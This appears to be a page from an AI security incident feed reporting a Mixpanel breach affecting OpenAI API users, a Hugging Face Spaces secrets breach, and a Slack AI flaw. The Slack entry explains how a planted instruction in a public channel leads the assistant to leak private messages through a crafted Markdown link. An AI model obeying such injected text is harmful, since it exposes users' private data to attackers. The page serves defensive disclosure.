Live Feed

AI Threat Intelligence

Real-time AI security incidents, vulnerability disclosures, and data breach alerts. Updated continuously. No spin. No delay.

3
Active Incidents
0
Critical Severity
Curated
Data Source
MEDIUM
November 9, 2025

OpenAI API User Data Exposed via Mixpanel Vendor Hack

Attackers compromised Mixpanel — a data analytics provider used by OpenAI — via a smishing (SMS phishing) campaign targeting an employee account. A dataset containing analytics data for a subset of OpenAI API platform users was exported without authorisation. Exposed data included names, email addresses, approximate location derived from browser, browser and OS metadata, and OpenAI organisation/user IDs. No chat history, API keys, or payment data was compromised. OpenAI immediately terminated its relationship with Mixpanel and launched expanded vendor security reviews.

OpenAI API PlatformChatGPT (help centre users)email addressesuser profileslocation data
⚡ Action Required

Be vigilant for targeted phishing emails referencing OpenAI. Do not click unsolicited links claiming to be from OpenAI support. Rotate your OpenAI API keys as a precaution even though keys were not directly exposed.

Source: OpenAI SecurityRead report →
HIGH
August 20, 2024

Slack AI Leaks Private Channel Data via Indirect Prompt Injection

Security researchers at PromptArmor disclosed that Slack AI can be weaponised via indirect prompt injection to exfiltrate data from private channels the attacker has no access to. By posting a malicious instruction in a public channel, an attacker tricks Slack AI into constructing a Markdown link that silently transmits private message content to an attacker-controlled server — without the victim needing to be in the public channel. After August 14 2024, Slack expanded ingestion to uploaded documents and Google Drive files, significantly widening the attack surface beyond chat messages.

Slack AIprivate messagesdocumentsapi keys
⚡ Action Required

Disable Slack AI access to documents and uploaded files until a patch is confirmed. Avoid storing API keys or credentials in any Slack channel. Audit your organisation's Slack AI permissions and review which channels AI can ingest.

Source: PromptArmorRead report →
HIGH
May 31, 2024

Hugging Face Spaces Breach Exposes Authentication Secrets Across AI Projects

Hugging Face detected unauthorised access to its Spaces platform — the central hub used by over 1 million AI researchers and developers to host models, datasets, and live demos. A subset of Spaces secrets (API tokens and service credentials stored by developers) was accessed without authorisation. Hugging Face revoked all affected tokens and notified impacted users by email. The breach triggered a full security overhaul: removal of org-level tokens, introduction of KMS-based secret management, and a partnership with TruffleHog to continuously scan for exposed credentials across the platform.

Hugging Face SpacesHugging Face HubAI models hosted on HFapi tokenscredentialssecrets
⚡ Action Required

Immediately revoke and regenerate all Hugging Face tokens. Audit any secrets or credentials stored in HF Spaces environment variables. Switch to fine-grained access tokens. Review all downstream services that authenticate using HF tokens.

Source: Hugging Face Security TeamRead report →
Get alerted the moment a new threat drops

ScanAix Shield Pro sends real-time browser notifications as soon as a new incident is confirmed. Free users get alerts with a 24-hour delay.